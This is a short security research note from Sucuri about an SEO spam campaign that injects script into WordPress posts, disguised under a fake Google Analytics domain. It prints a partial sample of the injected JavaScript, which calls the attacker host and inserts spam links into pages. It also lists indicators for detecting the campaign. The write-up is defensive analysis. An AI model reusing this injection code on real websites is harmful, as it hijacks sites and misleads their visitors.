• Skip to primary navigation
  • Skip to content
  • Skip to primary sidebar
  • Skip to footer

Sucuri Blog

Website Security News

  • Products
    • Website Security Platform
    • Website Firewall (WAF)
    • Enterprise Website Security
    • Multisite Solutions
  • Features
    • Detection
    • Protection
    • Performance
    • Response
    • Backups
  • Partners
    • Agency Solutions
    • Partners
    • Referral Program
    • Ecommerce
  • Resources
    • Guides
    • Webinars
    • Infographics
    • SiteCheck
    • Reports
    • Email Courses
  • Immediate Help
  • Login
Labs Note

Spam Injector Masquerading as Google Analytics

June 21, 2019Keith Petkus

0
SHARES
FacebookTwitterSubscribe

The domain en-google-analytic[.]com, currently sinkholed by a security intelligence company, has been observed by our team to be part of a mass spam injection campaign. This attack was active as far back as February 2016 according to the Internet Archive Wayback Machine.

We have seen recent cases in the wild where a script is injected into WordPress posts. The script then generates an AJAX request from a visitor’s web browser to the following URL format:

hxxp://en-google-analytic[.]com/client-slots/check/<fully qualified domain name>;<base64 encoded string of the URL>;<string of the IP address>;ver1_0

The results are then inserted directly into the document body by using JavaScript to insert spam links (as shown in the partial sample below):

clientInfo.callGet('hxxp://en-google-analytic[.]com/client-slots/check/' + dataString, function(dataLinks) { 
  if (dataLinks) { 
    dataLinks = 
    JSON.parse(dataLinks); 
    for (var i = 0; i < dataLinks.length; i++) { 
       var div1 = document.createElement('a'); 
       div1.title = dataLinks[i].anchor; 
       div1.href = dataLinks[i].href; 
       div1.setAttribute('style', 'display:block;'); 
       div1.innerHTML = dataLinks[i].anchor; 
       document.body.insertBefore(div1, document.body.firstChild); 
    } 
} 

It’s worth noting that this piece of malware captures the IP address using a remote request to api.ipify.org which is a legitimate third-party API service.

So, if you happen to stumble upon references to en-google-analytic[.]com on your website or in your WordPress posts, it would be a good idea to have the site checked out to make sure it’s not infected with spam as part of this campaign.

0
SHARES
FacebookTwitterSubscribe

Categories: Sucuri Labs, Website Malware Infections, WordPress SecurityTags: Labs Note, SEO Spam, SQL Injection

Reader Interactions

Primary Sidebar

Socialize With Sucuri

We're actively engaged across multiple platforms. Follow us and let's connect!

  • Facebook
  • Twitter
  • LinkedIn
  • YouTube
  • Instagram
  • RSS Feed

WordPress Security Course

The Anatomy of Website Malware Webinar

WordPress Security Guide

Join Over 20,000 Subscribers!

Footer

Products

  • Website Firewall
  • Website AntiVirus
  • Website Backups
  • WordPress Security
  • Enterprise Services

Solutions

  • DDos Protection
  • Malware Detection
  • Malware Removal
  • Malware Prevention
  • Blacklist Removal

Support

  • Blog
  • Knowledge Base
  • SiteCheck
  • Research Labs
  • FAQ

Company

  • About
  • Media
  • Events
  • Employment
  • Contact
  • Testimonials
  • Facebook
  • Twitter
  • LinkedIn
  • Instagram

Customer Login

Sucuri Home

  • Terms of Use
  • Privacy Policy
  • Frequently Asked Questions

© 2021 Sucuri Inc. All rights reserved

Sucuri Cookie Policy
See our policy>>

Our website uses cookies, which help us to improve our site and enables us to deliver the best possible service and customer experience.